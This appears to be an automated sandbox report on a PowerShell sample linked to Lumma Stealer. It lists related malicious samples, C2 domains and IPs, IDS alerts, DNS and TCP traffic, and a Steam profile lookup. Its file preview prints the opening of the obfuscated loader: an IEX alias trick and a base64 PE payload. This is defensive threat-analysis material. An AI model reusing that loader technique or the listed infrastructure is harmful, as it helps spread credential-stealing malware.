03:00:06	API Interceptor	7x Sleep call for process: powershell.exe modified
03:00:07	API Interceptor	2x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.157.254	KRNL.exe	Get hash	malicious	LummaC	Browse
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse
	XYQ1pqHNiT.exe	Get hash	malicious	LummaC	Browse
	5Z19n7XRT1.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.157.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.66.86
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
steamcommunity.com	KRNL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	104.102.49.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.121.10.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	http://www.rr8844.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://bitl.to/3Y0B	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.208.240
	ETVk1yP43q.exe	Get hash	malicious	AZORult	Browse	104.21.79.229
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	162.159.128.233
	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	188.114.96.3
	16oApcahEa.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	544WP3NHaP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
AKAMAI-ASUS	armv6l.elf	Get hash	malicious	Unknown	Browse	104.72.144.32
	https://bitl.to/3Y0B	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.102.43.106
	KRNL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	96.17.237.158
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	setup.exe	Get hash	malicious	Unknown	Browse	23.217.49.150
	decrypt.exe	Get hash	malicious	Unknown	Browse	184.28.90.27
	decrypt.exe	Get hash	malicious	Unknown	Browse	184.28.90.27

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ETVk1yP43q.exe	Get hash	malicious	AZORult	Browse	172.67.157.254 104.102.49.254
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	SET_UP.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	qnUFsmyxMm.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	yTcaknrrb8.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllulhhf/z:NllU
MD5:	B283C769D040651AA26FFE7F1296E297
SHA1:	F4B1D91D58C72B439EA4CA55A3E75F5F53A117E5
SHA-256:	97677EADF7A2FB6F27A32BAA73C5471A5BA31702A36509AB9FEB478448B2D837
SHA-512:	9114535C2EA58850D30DFA7552F420FBAB32FBFD999B0CAC0B8CB050F27EF65FE5BC3749E78B35A2C489561571B5452182197A51DC2B82ADC6DD70D94BEA03D7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ouyw53.ypu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qikrmnsn.c4l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7273981856773224
Encrypted:	false
SSDEEP:	48:knLJODXlWtLCe3CyxU2U6KukvhkvklCywZPsZTlHJeSogZoVvsZTlueSogZoR1:kn9GKH3CpTkkvhkvCCtJsZT7HqsZTSHy
MD5:	F186F3E109D85761859F20470FE23928
SHA1:	79A82EFB97AE8C34286590963D715E2AB66395DD
SHA-256:	6047DC2CB46E9A239E16C59DFDD724639CB71BCB33766966056844324B5DBABB
SHA-512:	66601E605A17A2EDF0423561AA8FD7C587E3006AF9EE9CC92E8F032A4CBD45CE02982D2B34FE297037AAF39A25EEA947084584478E5F79CC666AE7011B7C95E1
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S....b.T.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....l.P.\...u.T.\......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2"Z.@...........................^.A.p.p.D.a.t.a...B.V.1....."Z}?..Roaming.@......EW<2"Z}?..../.....................A.M.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2"Zz?....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2"Zz?....2.......................,.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2"Zz?....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2"Zz?....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2"Z.@....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYV2HRJUKEDHKLEUPOB0.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7273981856773224
Encrypted:	false
SSDEEP:	48:knLJODXlWtLCe3CyxU2U6KukvhkvklCywZPsZTlHJeSogZoVvsZTlueSogZoR1:kn9GKH3CpTkkvhkvCCtJsZT7HqsZTSHy
MD5:	F186F3E109D85761859F20470FE23928
SHA1:	79A82EFB97AE8C34286590963D715E2AB66395DD
SHA-256:	6047DC2CB46E9A239E16C59DFDD724639CB71BCB33766966056844324B5DBABB
SHA-512:	66601E605A17A2EDF0423561AA8FD7C587E3006AF9EE9CC92E8F032A4CBD45CE02982D2B34FE297037AAF39A25EEA947084584478E5F79CC666AE7011B7C95E1
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S....b.T.\..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....l.P.\...u.T.\......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2"Z.@...........................^.A.p.p.D.a.t.a...B.V.1....."Z}?..Roaming.@......EW<2"Z}?..../.....................A.M.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2"Zz?....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2"Zz?....2.......................,.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2"Zz?....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2"Zz?....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2"Z.@....u...........

Static File Info

General

File type:	ASCII text, with very long lines (65463), with CRLF line terminators
Entropy (8bit):	5.494423577675313
TrID:
File name:	176.113.115.170.ps1
File size:	526'220 bytes
MD5:	979c81c2d61e875e5634a5874d50f402
SHA1:	282f92e764c81121553f2e31035f88e5b0803a01
SHA256:	23aea7e9d32f547db65c086e7d067439588d3f6599f13090679787385bbf2b93
SHA512:	2d6f6fca8b81d27f9378b4d9cd83e54d7209754f2a5535f2a1133ff29ccdd4428d2845c862b55e71f7ef760c641e1e30433387ae50512c494b8b74430f1524a1
SSDEEP:	12288:rrSE6qcSyjKO2E1WvnbYToYQSD7PJLuzJj5wD:6Dqch2O1WfbYTBDzduhOD
TLSH:	D4B48D3101173C5E3B9A1ECA6400AEC00C9D3997BB54D194BE899136B2BE63B5F6D9FC
File Content Preview:	ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:00:07.793920+0100	2058580	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)	1	192.168.2.6	62245	1.1.1.1	53	UDP
2025-01-02T09:00:07.811562+0100	2058584	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)	1	192.168.2.6	50089	1.1.1.1	53	UDP
2025-01-02T09:00:07.821070+0100	2058586	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)	1	192.168.2.6	58372	1.1.1.1	53	UDP
2025-01-02T09:00:07.832106+0100	2058588	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)	1	192.168.2.6	62883	1.1.1.1	53	UDP
2025-01-02T09:00:07.843556+0100	2058590	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)	1	192.168.2.6	56792	1.1.1.1	53	UDP
2025-01-02T09:00:07.855873+0100	2058572	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)	1	192.168.2.6	58309	1.1.1.1	53	UDP
2025-01-02T09:00:07.866377+0100	2058576	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)	1	192.168.2.6	50798	1.1.1.1	53	UDP
2025-01-02T09:00:07.878042+0100	2058578	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)	1	192.168.2.6	59889	1.1.1.1	53	UDP
2025-01-02T09:00:08.530683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49712	104.102.49.254	443	TCP
2025-01-02T09:00:09.101775+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.6	49712	104.102.49.254	443	TCP
2025-01-02T09:00:09.787755+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49714	172.67.157.254	443	TCP
2025-01-02T09:00:39.756475+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49714	172.67.157.254	443	TCP
2025-01-02T09:00:39.756475+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49714	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:00:07.902220011 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:07.902252913 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:07.902647972 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:07.905836105 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:07.905850887 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:08.530599117 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:08.530683041 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:08.533760071 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:08.533766985 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:08.534024954 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:08.578058958 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:08.659607887 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:08.707345009 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101787090 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101809025 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101844072 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101866961 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101876020 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.101897001 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101913929 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.101929903 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.101929903 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.101943970 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.101960897 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.196741104 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.196770906 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.196896076 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.196913958 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.196964979 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.201922894 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.202008009 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.202016115 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.202030897 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.202060938 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.202089071 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.252156019 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.252206087 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.252226114 CET	49712	443	192.168.2.6	104.102.49.254
Jan 2, 2025 09:00:09.252233982 CET	443	49712	104.102.49.254	192.168.2.6
Jan 2, 2025 09:00:09.316387892 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.316438913 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:09.316508055 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.316998005 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.317013025 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:09.787688971 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:09.787755013 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.789937973 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.789952040 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:09.790198088 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:09.791871071 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.791887999 CET	49714	443	192.168.2.6	172.67.157.254
Jan 2, 2025 09:00:09.791939974 CET	443	49714	172.67.157.254	192.168.2.6
Jan 2, 2025 09:00:39.756083965 CET	49714	443	192.168.2.6	172.67.157.254

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:00:07.793920040 CET	62245	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.803359032 CET	53	62245	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.811562061 CET	50089	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.819488049 CET	53	50089	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.821069956 CET	58372	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.829750061 CET	53	58372	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.832106113 CET	62883	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.840572119 CET	53	62883	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.843555927 CET	56792	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.851891041 CET	53	56792	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.855873108 CET	58309	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.864540100 CET	53	58309	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.866377115 CET	50798	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.874773979 CET	53	50798	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.878041983 CET	59889	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.886873007 CET	53	59889	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:07.888663054 CET	64580	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:07.895458937 CET	53	64580	1.1.1.1	192.168.2.6
Jan 2, 2025 09:00:09.291738033 CET	64711	53	192.168.2.6	1.1.1.1
Jan 2, 2025 09:00:09.301038980 CET	53	64711	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 2, 2025 09:00:07.793920040 CET	192.168.2.6	1.1.1.1	0x142b	Standard query (0)	inherineau.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.811562061 CET	192.168.2.6	1.1.1.1	0xa794	Standard query (0)	prisonyfork.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.821069956 CET	192.168.2.6	1.1.1.1	0xe7cc	Standard query (0)	rebuildeso.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.832106113 CET	192.168.2.6	1.1.1.1	0x2cf5	Standard query (0)	scentniej.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.843555927 CET	192.168.2.6	1.1.1.1	0xd11e	Standard query (0)	screwamusresz.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.855873108 CET	192.168.2.6	1.1.1.1	0x8f2b	Standard query (0)	appliacnesot.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.866377115 CET	192.168.2.6	1.1.1.1	0x1161	Standard query (0)	cashfuzysao.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.878041983 CET	192.168.2.6	1.1.1.1	0x85f9	Standard query (0)	hummskitnj.buzz	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.888663054 CET	192.168.2.6	1.1.1.1	0xb00	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:09.291738033 CET	192.168.2.6	1.1.1.1	0x330d	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:00:07.803359032 CET	1.1.1.1	192.168.2.6	0x142b	Name error (3)	inherineau.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.819488049 CET	1.1.1.1	192.168.2.6	0xa794	Name error (3)	prisonyfork.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.829750061 CET	1.1.1.1	192.168.2.6	0xe7cc	Name error (3)	rebuildeso.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.840572119 CET	1.1.1.1	192.168.2.6	0x2cf5	Name error (3)	scentniej.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.851891041 CET	1.1.1.1	192.168.2.6	0xd11e	Name error (3)	screwamusresz.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.864540100 CET	1.1.1.1	192.168.2.6	0x8f2b	Name error (3)	appliacnesot.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.874773979 CET	1.1.1.1	192.168.2.6	0x1161	Name error (3)	cashfuzysao.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.886873007 CET	1.1.1.1	192.168.2.6	0x85f9	Name error (3)	hummskitnj.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:07.895458937 CET	1.1.1.1	192.168.2.6	0xb00	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:09.301038980 CET	1.1.1.1	192.168.2.6	0x330d	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Jan 2, 2025 09:00:09.301038980 CET	1.1.1.1	192.168.2.6	0x330d	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	104.102.49.254	443	3392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 08:00:08 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-02 08:00:09 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 02 Jan 2025 08:00:09 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=04d40b7906c0cc30e6e7cf60; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-02 08:00:09 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 